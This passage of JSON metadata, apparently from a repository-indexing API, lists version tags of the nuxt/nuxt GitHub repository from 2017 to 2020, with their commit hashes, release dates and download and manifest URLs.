oad.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_pars